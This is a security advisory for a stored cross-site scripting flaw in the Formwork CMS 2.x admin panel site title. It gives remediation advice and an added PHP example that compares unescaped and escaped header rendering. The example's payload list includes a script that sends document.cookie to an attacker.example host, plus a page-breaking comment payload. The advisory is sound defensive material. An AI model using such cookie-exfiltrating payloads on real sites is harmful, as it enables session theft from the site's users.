PT-2025-9201 · Formwork · Formwork

Published

2025-03-01

·

Updated

2025-03-01

CVSS v3.1

4.7

Medium

Vector

AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
Name of the Vulnerable Software and Affected Versions

Formwork versions 2.x

Description

The site title field at "/panel/options/site" accepts arbitrary HTML, and the stored value is rendered unescaped in the panel header navigation. An attacker who can change the title can therefore store JavaScript that executes in the browser of every user who opens the panel (stored XSS), so the impact grows with the number of panel users. The same unescaped sink also affects availability: a title such as "<!--" opens an unterminated HTML comment that swallows the rest of the panel markup, leaving the panel unusable for everyone until the title is repaired. Exploitation requires admin privileges to edit the site options, which is why the vector carries PR:H and the severity is only Medium.

Recommendations

For Formwork 2.x, update to a release that includes commit aa3e9c6, which escapes the site title when it is output in the panel header navigation. Until the update is applied, restrict access to the site options page (and therefore the site title field) to the smallest possible set of trusted administrators, and review the current site title value for injected markup.
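The following is an added example written for this advisory; it is not Formwork's code and the template fragments, function names and payloads are hypothetical. It contrasts a header-navigation template that interpolates the site title verbatim with one that escapes it, and runs both against a constructed script payload and the unterminated-comment payload mentioned above, so the two impacts (script execution and broken markup) can be seen side by side.

```php
<?php
// Added example, not Formwork's own code. Shows why an unescaped site title
// in the panel header navigation is a stored-XSS and page-breaking sink,
// and how output escaping closes it. Template fragments are hypothetical.

declare(strict_types=1);

// Constructed attacker-controlled values, as an admin could save them in
// the site title field at /panel/options/site.
$payloads = [
    'benign'  => 'My Site',
    'xss'     => '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
    'comment' => '<!--', // unterminated HTML comment: swallows the rest of the page
];

// Vulnerable rendering: the title is concatenated into the markup as-is.
function renderHeaderVulnerable(string $siteTitle): string
{
    return '<nav class="header"><a href="/panel/">' . $siteTitle
        . '</a><ul><li>Pages</li><li>Options</li></ul></nav>';
}

// Escape the HTML metacharacters so the title can only ever be text.
function escapeHtml(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Fixed rendering: same template, title passed through the escaper.
function renderHeaderFixed(string $siteTitle): string
{
    return '<nav class="header"><a href="/panel/">' . escapeHtml($siteTitle)
        . '</a><ul><li>Pages</li><li>Options</li></ul></nav>';
}

// Crude indicator that raw markup from the title survived into the output.
// A real check would load the panel in a browser and watch for script
// execution or missing navigation elements.
function containsRawMarkup(string $html): bool
{
    return str_contains($html, '<script') || str_contains($html, '<!--');
}

foreach ($payloads as $name => $title) {
    $vulnerable = renderHeaderVulnerable($title);
    $fixed      = renderHeaderFixed($title);

    printf("%-8s vulnerable: %s\n", $name,
        containsRawMarkup($vulnerable) ? 'RAW MARKUP INJECTED' : 'ok');
    printf("%-8s fixed:      %s\n", $name,
        containsRawMarkup($fixed) ? 'RAW MARKUP INJECTED' : 'ok');
    printf("         fixed output: %s\n\n", $fixed);
}
```

The "comment" case is the availability angle from the description: in the vulnerable template everything after the title, including the navigation list, becomes part of an HTML comment, so the panel renders without its menu. The escaped output turns `<!--` into `&lt;!--`, which the browser displays as literal text. Running the script needs PHP 8 or later for `str_contains`.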

Fix

XSS


Weakness Enumeration

Related Identifiers

GHSA-VF6X-59HH-332F

Affected Products

Formwork